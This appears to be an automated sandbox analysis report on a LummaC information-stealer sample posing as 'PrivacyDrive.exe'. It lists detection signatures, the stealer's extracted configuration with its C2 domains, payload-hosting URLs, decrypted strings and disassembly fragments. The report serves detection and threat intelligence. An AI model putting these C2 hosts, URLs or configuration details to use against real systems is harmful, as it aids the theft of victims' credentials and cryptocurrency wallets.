Windows Analysis Report

Overview

General Information

Analysis ID:	1519581
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

C2 URLs / IPs found in malware configuration

Contains functionality to infect the boot sector

Loading BitLocker PowerShell Module

LummaC encrypted strings found

Powershell drops PE file

Powershell uses Background Intelligent Transfer Service (BITS)

Sample uses string decryption to hide its real strings

Sigma detected: PowerShell Download and Execution Cradles

Suspicious powershell command line found

AV process strings found (often used to terminate AV products)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to delete services

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

Potential key logger detected (key state polling based)

Queries disk information (often used to detect virtual machines)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: PowerShell Web Download

Sigma detected: Usage Of Web Request Commands And Cmdlets

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/ https://censys.com/a-beginners-guide-to-hunting-open-directories/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Signatures

AV Detection

Antivirus detection for URL or domain

Source: https://racedsuitreow.shop/P	Avira URL Cloud: Label: malware
Source: https://finalstepgo.com/	Avira URL Cloud: Label: malware
Source: covvercilverow.shop	Avira URL Cloud: Label: malware
Source: https://racedsuitreow.shop/apiJV&	Avira URL Cloud: Label: malware
Source: https://racedsuitreow.shop/apiU.h	Avira URL Cloud: Label: malware
Source: https://finalstepgo.com/uploads/il222.zip	Avira URL Cloud: Label: malware
Source: pumpkinkwquo.shop	Avira URL Cloud: Label: malware
Source: abortinoiwiam.shop	Avira URL Cloud: Label: malware
Source: deallyharvenw.shop	Avira URL Cloud: Label: malware
Source: https://finalstepgo.com/uploads/il222.zipK	Avira URL Cloud: Label: malware
Source: https://finalstepgo.com:443/uploads/il222.zip	Avira URL Cloud: Label: malware
Source: defenddsouneuw.shop	Avira URL Cloud: Label: malware
Source: https://racedsuitreow.shop/apiV	Avira URL Cloud: Label: malware
Source: priooozekw.shop	Avira URL Cloud: Label: malware
Source: https://racedsuitreow.shop/	Avira URL Cloud: Label: malware
Source: https://racedsuitreow.shop/)e3	Avira URL Cloud: Label: malware
Source: https://finalstepgo.com/a	Avira URL Cloud: Label: malware
Source: https://racedsuitreow.shop/apisP	Avira URL Cloud: Label: malware
Source: https://racedsuitreow.shop/api	Avira URL Cloud: Label: malware
Source: https://racedsuitreow.shop/3	Avira URL Cloud: Label: malware
Source: surroundeocw.shop	Avira URL Cloud: Label: malware
Source: racedsuitreow.shop	Avira URL Cloud: Label: malware
Source: https://racedsuitreow.shop:443/api	Avira URL Cloud: Label: malware
Source: candleduseiwo.shop	Avira URL Cloud: Label: malware
Source: https://racedsuitreow.shop/apie	Avira URL Cloud: Label: malware
Source: https://finalstepgo.com/uploads/il2.txt	Avira URL Cloud: Label: malware
Source: https://finalstepgo.com:443/uploads/il222.zipe	Avira URL Cloud: Label: malware

Found malware configuration

Source: PrivacyDrive.exe.764.8.memstrmin

Malware Configuration Extractor: LummaC {"C2 url": ["abortinoiwiam.shop", "deallyharvenw.shop", "defenddsouneuw.shop", "pumpkinkwquo.shop", "covvercilverow.shop", "surroundeocw.shop", "priooozekw.shop", "candleduseiwo.shop", "racedsuitreow.shop"], "Build id": "yJEcaG--rui1222"}

Sample uses string decryption to hide its real strings

Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp	String decryptor: covvercilverow.shop
Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp	String decryptor: surroundeocw.shop
Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp	String decryptor: abortinoiwiam.shop
Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp	String decryptor: pumpkinkwquo.shop
Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp	String decryptor: priooozekw.shop
Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp	String decryptor: deallyharvenw.shop
Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp	String decryptor: defenddsouneuw.shop
Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp	String decryptor: racedsuitreow.shop
Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp	String decryptor: candleduseiwo.shop
Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp	String decryptor: yJEcaG--rui1222

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

Code function: 4_2_0052D130 CryptAcquireContextA,CryptAcquireContextA,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext,

4_2_0052D130

Source: unknown	HTTPS traffic detected: 185.255.122.133:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.255.122.133:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.206.221:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.206.221:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.206.221:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.206.221:443 -> 192.168.2.4:49749 version: TLS 1.2

Source:	Binary string: F:\PD3\bin\Release\PrivacyDrive.pdb source: PrivacyDrive.exe, 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000004.00000000.1815371616.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000004.00000003.1912706269.00000000052C4000.00000004.00000800.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000002.2149603912.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000008.00000000.1925315316.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000008.00000003.2019923963.0000000005386000.00000004.00000800.00020000.00000000.sdmp, PrivacyDrive.exe.2.dr
Source:	Binary string: F:\PD3\bin\Release\PrivacyDrive.pdbN source: PrivacyDrive.exe, 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000004.00000000.1815371616.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000004.00000003.1912706269.00000000052C4000.00000004.00000800.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000002.2149603912.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000008.00000000.1925315316.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000008.00000003.2019923963.0000000005386000.00000004.00000800.00020000.00000000.sdmp, PrivacyDrive.exe.2.dr

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00477BE0 FindFirstFileW,		4_2_00477BE0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00495D80 FindFirstFileW,FindClose,		4_2_00495D80

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	4_2_00F96013
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	4_2_00F9600C
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then movzx edx, byte ptr [ecx+eax]	4_2_00F911B2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-18h]	4_2_00FAD0CE
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-54h]	4_2_00FA2132
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-18h]	4_2_00FAD134
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	4_2_00FC12FC
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 77A9E0C4h	4_2_00FC12FC
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	4_2_00FCC2B2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [ebx], al	4_2_00FB429B
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [ebx], al	4_2_00FB429B
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	4_2_00FBC282
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh	4_2_00FC5272
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [ebx], al	4_2_00FB4215
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [ebx], al	4_2_00FB4215
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh	4_2_00FC63F2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	4_2_00F9539E
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	4_2_00FA8312
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp byte ptr [edi], 00000000h	4_2_00F974E1
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+10h]	4_2_00F8F4B2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, 0000000Bh	4_2_00FB54B5
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then movzx ebp, word ptr [edi]	4_2_00FC0432
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-54h]	4_2_00FA2403
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000744h]	4_2_00FB45CB
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [edi], al	4_2_00FB45CB
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [ebx], al	4_2_00FB45CB
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-54h]	4_2_00FA25AE
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov word ptr [eax], cx	4_2_00FA8582
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	4_2_00FAF577
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	4_2_00F9F6C4
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	4_2_00F866B2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	4_2_00FAA692
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], CECD21FDh	4_2_00FAD652
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh	4_2_00FAD652
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov word ptr [eax], cx	4_2_00FCB612
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	4_2_00FB076F
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	4_2_00FB076F
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ebx]	4_2_00F87712
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov edi, ecx	4_2_00F958A8
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then push ebx	4_2_00F9F835
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	4_2_00FC9832
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 54CA534Eh	4_2_00FC9832
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	4_2_00F959AB
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+28h]	4_2_00F959AB
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	4_2_00F9C952
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	4_2_00F92911
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp byte ptr [edi], 00000000h	4_2_00F97AF3
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then jmp eax	4_2_00F97BF4
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	4_2_00FCBBE2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp word ptr [ebx+eax+02h], 0000h	4_2_00FA0B95
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov word ptr [esi], ax	4_2_00FA0B95
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov edi, eax	4_2_00F88B72
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then jmp ecx	4_2_00FC0B62
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [edi], al	4_2_00FB4B4C
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	4_2_00FC2B02
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	4_2_00F94DDD
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	4_2_00FB1DB2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	4_2_00FA9DA7
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-34h]	4_2_00FA5D92
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	4_2_00FCBD62
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	4_2_00FC0EF0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, ebp	4_2_00F8BEE2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, ebp	4_2_00F8BEE2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esi+20h]	4_2_00FB3ED2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah	4_2_00FCBED2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov edi, dword ptr [ebp-3Ch]	4_2_00FAFEC1
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [edi], al	4_2_00FB4E2D
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	4_2_00FC4E22
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [edi], al	4_2_00FB4E18
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	4_2_00FB0E11
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	4_2_00FCBFE2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esi+20h]	4_2_00FB3EB7
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esi+20h]	4_2_00FB3F33
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then movzx edx, byte ptr [ecx+eax]	4_2_051AF7B0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	4_2_051EA1E0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esi+20h]	4_2_051D2531
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esi+20h]	4_2_051D24B5
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	4_2_051EA5E0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [edi], al	4_2_051D3419
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	4_2_051CF40F
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [edi], al	4_2_051D342B
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	4_2_051E3420
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esi+20h]	4_2_051D24D0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah	4_2_051EA4D0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov edi, dword ptr [ebp-3Ch]	4_2_051CE4C2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	4_2_051DF4EE
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, ebp	4_2_051AA4E0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, ebp	4_2_051AA4E0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-18h]	4_2_051CB6CC
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-54h]	4_2_051C0730
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-18h]	4_2_051CB732
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	4_2_051B4611
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	4_2_051B460A
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	4_2_051E1100
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov byte ptr [edi], al	4_2_051D314A
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov edi, eax	4_2_051A7170
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then jmp ecx	4_2_051DF160
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp word ptr [ebx+eax+02h], 0000h	4_2_051BF193
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov word ptr [esi], ax	4_2_051BF193
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then jmp eax	4_2_051B61F2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp byte ptr [edi], 00000000h	4_2_051B60F1
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	4_2_051EA360
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-34h]	4_2_051C4390
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	4_2_051D03B0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	4_2_051C83A5
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	4_2_051B33DB
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ebx]	4_2_051A5D10
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	4_2_051CED6D
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	4_2_051CED6D
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov word ptr [eax], cx	4_2_051E9C10
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], CECD21FDh	4_2_051CBC50
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh	4_2_051CBC50
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	4_2_051C8C90
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	4_2_051A4CB0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	4_2_051BDCC2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	4_2_051B0F0F
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	4_2_051BAF50
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	4_2_051B3FA9
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp+28h]	4_2_051B3FA9
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then push ebx	4_2_051BDE33
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov eax, dword ptr [esp]	4_2_051E7E30
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 54CA534Eh	4_2_051E7E30
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4x nop then mov edi, ecx	4_2_051B3EA6
